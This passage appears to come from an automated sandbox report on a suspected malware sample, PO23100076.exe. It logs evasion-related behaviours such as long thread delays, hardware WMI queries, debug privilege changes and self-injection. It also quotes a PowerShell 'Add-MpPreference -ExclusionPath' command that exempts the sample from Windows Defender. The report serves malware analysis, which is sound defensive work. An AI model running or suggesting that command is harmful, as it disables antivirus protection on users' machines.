                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: PO23100076.exe PID: 5392, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\PO23100076.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: AB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: 7050000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: 8050000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: 81F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: 91F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: 2A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8033Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1334Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeWindow / User API: threadDelayed 2867Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeWindow / User API: threadDelayed 4695Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 3624Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2868Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 7116Thread sleep count: 2867 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -99857s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -99676s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -99500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -99358s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -99249s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -99125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -99011s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 7116Thread sleep count: 4695 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -98890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -98779s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -98671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -98562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -98452s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -98343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -98234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -98118s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -98000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -97890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -97781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -97671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -97562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -97453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -97340s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -97232s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -97121s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -97011s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -96890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -96781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -96671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -96562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -96453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -96343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -96234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -96124s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -96015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -95906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -95796s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\PO23100076.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\PO23100076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 99857Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 99676Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 99500Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 99358Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 99249Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 99125Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 99011Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 98890Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 98779Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 98671Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 98562Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 98452Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 98343Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 98234Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 98118Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 98000Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 97890Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 97781Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 97671Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 97562Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 97453Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 97340Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 97232Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 97121Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 97011Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 96890Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 96781Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 96671Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 96562Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 96453Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 96343Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 96234Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 96124Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 96015Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 95906Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 95796Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: PO23100076.exe, 00000008.00000002.2487640721.0000000000C71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeMemory written: C:\Users\user\Desktop\PO23100076.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Users\user\Desktop\PO23100076.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
